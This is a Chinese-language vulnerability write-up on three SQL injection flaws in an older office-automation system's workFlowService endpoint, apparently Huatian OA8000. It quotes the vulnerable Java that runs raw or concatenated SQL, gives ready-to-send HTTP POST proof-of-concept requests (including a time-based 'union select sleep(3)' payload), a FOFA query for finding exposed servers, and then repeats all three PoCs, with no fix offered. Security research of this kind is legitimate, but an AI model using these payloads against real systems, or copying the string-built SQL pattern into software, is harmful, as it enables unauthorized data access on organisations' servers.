某天OA-workFlowService-多处SQL注入漏洞分析

OA系统较早版本中（<=2016版本）使用了已经停止更新的Buffalo-Ajax服务，通过Servlet的init过程初始化配置暴露给Buffalo远程调用的服务。该服务一般通过内置文件buffalo-service.properties进行配置。

来到/WEB-INF/classes/buffalo-service.properties文件，查看workFlowService对应的包位置

对应位置为

com.oa8000.httrace.httrace01.manager.HtTrace01SqlProcess

来到代码进行审计

SQL注入（一）

接口中存在getAwokeListData方法如下

关键代码中，读取了setStr参数并解析json内容。之后读取json中名称为k的参数对应的值，判断是否存在冒号分隔，存在则取冒号之前的为数据库源名称进行连接，冒号之后的作为查询的SQL语句；反之不存在则直接连接当前数据库，然后执行SQL语句

publicList getAwokeListData(String setStr) {  
if (setStr == null)  
returnnew ArrayList();   
String newSql = "";  
String dbSourceName = "";  
    Connection con = null;  
    Statement smt = null;  
    ResultSet rs = null;  
    Session hiSession = null;  
    JSONObject jObject = JSONObject.fromObject(setStr);  
String sql = jObject.getString("k");  
String[] sqlAndSource = sql.split(":");  
List> list = new LinkedList();  
if (sqlAndSource.length > 1) {  
      dbSourceName = sqlAndSource[0];  
      newSql = sqlAndSource[1];  
    } else {  
      newSql = sqlAndSource[0];  
    }   
    hiSession = null;  
boolean innerDbFlg = (dbSourceName == null || "".equals(dbSourceName));  
try {  
      hiSession = TransactionManager.getInstance().getCurrentSession();  
if (innerDbFlg) {  
        con = hiSession.connection();  
      } else {  
        con = (new HiOaBaseSQLManager(hiSession)).userOuterDbSource(dbSourceName);  
      }   
      smt = con.createStatement();  
      rs = smt.executeQuery(newSql);

根据Buffalo-Ajax的请求格式，构造如下请求体，method中指定方法名称为getAwokeListData，参数为{"k":"SELECT database()","v":""}

POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1
Host:
Accept-Encoding: identity
Content-Length: 103
Accept-Language: zh-CN,zh;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Cache-Control: max-age=0

<buffalo-call>
    <method>getAwokeListData</method>
    <string>{"k":"SELECT database()","v":""}</string>
</buffalo-call>

直接查询出数据库名称

SQL注入（二）

来看第二个SQL注入漏洞，也在该service中方法名称为getAfterUserID

关键代码就是

String sql = "SELECT user_id FROM user_user WHERE user_id in (" + tracedUsers + ",'" + userId + "') " + " order by user_order ";

传参直接被拼接到SQL语句中执行，造成注入

构造数据包如下，使用延时注入进行验证

POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1
Host: 
Accept-Encoding: identity
Content-Length: 103
Accept-Language: zh-CN,zh;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Cache-Control: max-age=0

<buffalo-call>
    <method>getAfterUserID</method>
    <string>1</string>
    <string>1') union select sleep(3)#</string>
</buffalo-call>

延时3秒

SQL注入（三）

来到最后一个方法，名称为getDataListForTree

此处调用GetDatas方法，代码如下

publicList getDatas(String sql) throws OaException {  
if (sql == null || "".equals(sql))  
returnnew ArrayList();   
    Session hiSession = null;  
try {  
      hiSession = TransactionManager.getInstance().getCurrentSession();  
      HiOaBaseSQLManager event = new HiOaBaseSQLManager(hiSession);  
return event.executeQuerySQL(sql);  
    } catch (Exception e) {  
      e.printStackTrace();  
thrownew OaException(e.getMessage());  
    } finally {  
if (hiSession != null)  
        hiSession.close();   
    }   
  }

传参sql直接执行SQL语句查询，构造的请求体如下

POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1
Host: 
Accept-Encoding: identity
Content-Length: 103
Accept-Language: zh-CN,zh;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Cache-Control: max-age=0

<buffalo-call> 
<method>getDataListForTree</method> 
<string>select user()</string> 
</buffalo-call>

直接查询获取结果

FOFA语法

app="华天动力-OA8000"

三个POC如下

POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1
Host:
Accept-Encoding: identity
Content-Length: 103
Accept-Language: zh-CN,zh;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Cache-Control: max-age=0

<buffalo-call>
    <method>getAwokeListData</method>
    <string>{"k":"SELECT database()","v":""}</string>
</buffalo-call>

POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1
Host: 
Accept-Encoding: identity
Content-Length: 103
Accept-Language: zh-CN,zh;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Cache-Control: max-age=0

<buffalo-call>
    <method>getAfterUserID</method>
    <string>1</string>
    <string>1') union select sleep(3)#</string>
</buffalo-call>

POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1
Host: 
Accept-Encoding: identity
Content-Length: 103
Accept-Language: zh-CN,zh;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Cache-Control: max-age=0

<buffalo-call> 
<method>getDataListForTree</method> 
<string>select user()</string> 
</buffalo-call>